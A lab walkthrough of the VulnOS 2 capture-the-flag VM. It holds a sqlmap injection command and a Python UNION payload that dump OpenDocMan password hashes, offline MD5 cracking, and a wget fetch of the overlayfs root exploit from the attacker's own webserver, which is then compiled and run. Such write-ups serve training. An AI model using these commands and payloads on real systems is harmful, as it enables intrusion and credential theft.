This is my solution to the Vuln OS 2 challenge by c4b3rw0lf.
Let’s get started:
We were not provided with any logon credentials for the VM, so I could not simply log in to check the target's IP address (unless I cheated by editing the GRUB boot entry). So the first step was finding the IP address.
root@kali:~# netdiscover -i eth0 -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.0.2.7 08:00:27:43:dc:89 01 060 CADMUS COMPUTER SYSTEMS
I know that my Kali machine and the target VM are the only machines on the virtual network, so that has to be it. Now that I know the IP of my target, I can perform some more recon using NMAP.
root@kali:~# nmap -n -sT -A -T4 10.0.2.7
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-05-25 11:20 CDT
Nmap scan report for 10.0.2.7
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:43:DC:89 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like we have SSH, a webserver, and an IRC server. Let's check out the webserver first.
Initially, I tried to enumerate some common directories using dirb, but nothing of interest came up. Upon accessing the website, we are given some instructions and a link to /jabc:
### Pentest the company website on the server... Get root of the system and read the final flag ###
Following the link, we are presented with a new webpage with a lot more options. It took me longer than I would like to admit, but I finally found something interesting at /jabc/?q=node/7. It looks like a blank page, but a Ctrl+A highlights the hidden text, and we are given yet another message and a link to follow:
Dear customer,
For security reasons, this section is hidden.
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
Thank you.
Navigating to /jabcd0cs/ presents us with a login panel. We were given the credentials guest/guest in the hidden message, so let's use those. Once logged in, I noticed you could upload files at /jabcd0cs/add.php. I poked around trying to exploit what I thought would be an unrestricted file upload vulnerability, but it got me nowhere.
I eventually noticed that the website was powered by OpenDocMan version 1.2.7. A quick Google search led me here:
OpenDocMan 1.2.7 Multiple Vulnerabilities
https://www.exploit-db.com/exploits/32075/
Reading over the advisory, I discovered that this version of OpenDocMan has a SQL injection vulnerability: the "add_value" parameter of "/ajax_udf.php" is used in a query without being sanitized. I fired up sqlmap against that parameter and dumped the users table, including the admin's hashed password (ignore the admins@admin[.]com entry; that was me registering an account):
sqlmap -u "http://10.0.2.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C Email,password,username --dump
Database: jabcd0cs
Table: odm_user
[3 entries]
+--------------------+----------------------------------+----------+
| Email | password | username |
+--------------------+----------------------------------+----------+
| [email protected] | b78aae356709f8c31118ea613980954b | webmin |
| [email protected] | 084e0343a0486ff05530df6c705c8bb4 | guest |
| [email protected] | 286755fad04869ca523320acce0dc6a4 |[redacted]|
+--------------------+----------------------------------+----------+
Using sqlmap, I also discovered that the web application was connecting to MySQL as the root database user, so a successful injection has every privilege the database can grant.
After cracking the webmin hash (an unsalted MD5), I discovered that the password is webmin1980. Remember we found that SSH was running? Let's see if the credentials are reused:
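To make the two steps above concrete, here is an added, self-contained Python sketch (my own example, not OpenDocMan's code and not from the original write-up). It models the vulnerable pattern the advisory's proof-of-concept implies, namely the add_value parameter being dropped into the FROM clause of a query, shows a UNION payload pulling username:hash pairs out of odm_user the way sqlmap did, contrasts it with a whitelist-plus-bind-parameter fix, and finishes with the offline MD5 wordlist check that "cracks" the dumped hashes. The table layout, the odm_udf table, the e-mail addresses, and the wordlist are all constructed; the seed hashes are derived from the plaintexts the write-up reports (guest and webmin1980), and the SQLite backend stands in for MySQL.

```python
import hashlib
import sqlite3

# Constructed sample data modelled on the dump above: unsalted MD5 hashes of
# the plaintexts the write-up reports for each account.
SEED_USERS = [
    ("webmin", "webmin1980", "webmin@example.com"),  # e-mail is made up
    ("guest", "guest", "guest@example.com"),         # e-mail is made up
]

# Constructed wordlist for the offline cracking step.
WORDLIST = ["password", "admin", "webmin", "guest", "opendocman", "webmin1980"]

# Assumed set of tables the endpoint is legitimately allowed to read.
ALLOWED_TABLES = {"odm_udf"}

# UNION payload: close the intended query, append our own SELECT, and
# comment out whatever the application appends afterwards.
PAYLOAD = "odm_udf WHERE 0 UNION SELECT username || ':' || password FROM odm_user --"


def make_db():
    """In-memory stand-in for the jabcd0cs database (SQLite instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE odm_user (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, Email TEXT)")
    conn.execute("CREATE TABLE odm_udf (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO odm_udf VALUES (1, 'Department')")
    for user, plain, email in SEED_USERS:
        digest = hashlib.md5(plain.encode()).hexdigest()
        conn.execute("INSERT INTO odm_user (username, password, Email) VALUES (?, ?, ?)",
                     (user, digest, email))
    conn.commit()
    return conn


def udf_lookup_vulnerable(conn, q, add_value):
    """Assumed vulnerable shape: the request parameter names the table to query."""
    sql = f"SELECT name FROM {add_value} WHERE id = {q}"
    return [row[0] for row in conn.execute(sql)]


def udf_lookup_hardened(conn, q, add_value):
    """Identifiers cannot be bound as parameters, so whitelist the table name
    and bind the value instead of interpolating it."""
    if add_value not in ALLOWED_TABLES:
        raise ValueError("unexpected table name")
    sql = f"SELECT name FROM {add_value} WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(q),))]


def hardened_rejects(conn, q, add_value):
    """True if the hardened lookup refuses the request."""
    try:
        udf_lookup_hardened(conn, q, add_value)
    except (ValueError, TypeError):
        return True
    return False


def dump_credentials(conn):
    """Mimic sqlmap's dump: return {username: md5hex} via the injected UNION."""
    rows = udf_lookup_vulnerable(conn, "1", PAYLOAD)
    return dict(row.split(":", 1) for row in rows if ":" in row)


def crack_md5(digest, wordlist):
    """Offline dictionary attack on an unsalted MD5; returns the plaintext or None."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    db = make_db()
    creds = dump_credentials(db)
    for user, digest in creds.items():
        print(user, digest, crack_md5(digest, WORDLIST))
    print("hardened rejects payload:", hardened_rejects(db, "1", PAYLOAD))
```

The lesson that carries over to the real application: when untrusted input has to become an identifier (table or column name), the only fix is a strict allow-list, because prepared statements cannot bind identifiers; and storing unsalted MD5 turns any read-only injection into a working SSH password the moment the hash is in a wordlist.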
root@kali:~# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed May 25 17:37:20 CEST 2016
System load: 0.0 Processes: 87
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 14% IP address for eth0: 10.0.2.7
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed May 25 17:37:20 2016 from 10.0.2.3
$ bash
webmin@VulnOSv2:~$
We can! After doing a bit of recon on the box, I didn't find anything worthwhile. However, this machine is running an old Ubuntu 14.04 kernel build:
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
Let’s go back to Kali and see what we can find:
root@kali:~# searchsploit Ubuntu 14
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
Ubuntu PAM MOTD File Tampering (Privilege Es | ./linux/local/14273.sh
Ubuntu PAM 1.1.0 MOTD - Local Root Exploit | ./linux/local/14339.sh
Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.1 | ./linux/dos/14452.txt
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37292.c
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37293.txt
--------------------------------------------- ----------------------------------
Looks like we may have found a local root exploit for Ubuntu 14.04 (the overlayfs bug, CVE-2015-1328). Let's check it out:
root@kali:/usr/share/exploitdb/platforms/linux/local# cat 37293.txt
The overlayfs filesystem does not correctly check file permissions when
creating new files in the upper filesystem directory. This can be exploited
by an unprivileged process in kernels with CONFIG_USER_NS=y and where
overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
inside unprivileged mount namespaces. This is the default configuration of
Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].
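Before pulling an exploit onto a box it is worth checking the two preconditions the advisory names: a kernel older than the fix, and CONFIG_USER_NS=y so an unprivileged process can mount overlayfs inside its own mount namespace. The following is an added Python helper of my own (not from the exploit or the original write-up) that parses an Ubuntu-style release string such as the one uname printed above, checks a /boot/config-style text for CONFIG_USER_NS, and combines the two. The fixed kernel version it compares against is an assumption to be verified against Ubuntu's advisory for CVE-2015-1328; the sample config text is constructed.

```python
import os
import re

# ASSUMPTION: first trusty kernel that shipped the overlayfs fix for
# CVE-2015-1328. Confirm against Ubuntu's advisory before relying on it.
ASSUMED_FIXED_KERNEL = (3, 13, 0, 55)

# Constructed stand-in for /boot/config-<release>.
SAMPLE_CONFIG = "CONFIG_OVERLAYFS_FS=m\nCONFIG_USER_NS=y\nCONFIG_NAMESPACES=y\n"


def parse_ubuntu_kernel(release):
    """'3.13.0-24-generic' -> (3, 13, 0, 24); None if not Ubuntu-style."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-", release)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def userns_enabled(config_text):
    """True if the kernel config text has CONFIG_USER_NS=y."""
    return re.search(r"^CONFIG_USER_NS=y$", config_text, re.M) is not None


def looks_exploitable(release, config_text, fixed=ASSUMED_FIXED_KERNEL):
    """Older than the fixed build (same series) and user namespaces enabled."""
    version = parse_ubuntu_kernel(release)
    if version is None or version[:3] != fixed[:3]:
        return False  # only reason about the same stable series as the fix
    return version < fixed and userns_enabled(config_text)


def check_local():
    """Run the same check on the current host (reads /boot/config-<release>)."""
    release = os.uname().release
    path = f"/boot/config-{release}"
    try:
        with open(path) as fh:
            config_text = fh.read()
    except OSError:
        return release, None  # no config file available; cannot decide
    return release, looks_exploitable(release, config_text)


if __name__ == "__main__":
    print(check_local())
```

The version comparison is deliberately confined to one stable series because Ubuntu backports fixes per series: a 3.13.0-60 build being patched says nothing about a 3.16 HWE kernel. The definitive test on a live target is still to run the exploit, but the kernel date and config line are what tell you it is worth trying.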
Hm, our target is running Ubuntu 14.04 on a kernel built in May 2014 (see the uname output above), long before this bug was fixed, so it is more than likely unpatched. Let's get the exploit onto the target machine, compile it, and run it:
root@kali:~# service apache2 start
root@kali:~# cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/
Here, I started my own webserver and copied the exploit into its document root. This way, I can use wget on the target machine to download the file.
webmin@VulnOSv2:~$ wget http://10.0.2.3/37292.c
--2016-05-25 18:54:05-- http://10.0.2.3/37292.c
Connecting to 10.0.2.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/x-csrc]
Saving to: ‘37292.c’
100%[======================================>] 5,123 --.-K/s in 0s
2016-05-25 18:54:05 (298 MB/s) - ‘37292.c’ saved [5123/5123]
Got it! Let’s compile it and cross our fingers:
webmin@VulnOSv2:~$ gcc 37292.c
webmin@VulnOSv2:~$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
We completed the challenge! I had quite a bit of fun with this one; it wasn't too difficult. I definitely could have saved myself some time if I had done more recon from the start. I recommend this to anyone looking to get started in boot2root challenges.
SOURCE:
My Blog
Proof that it’s my blog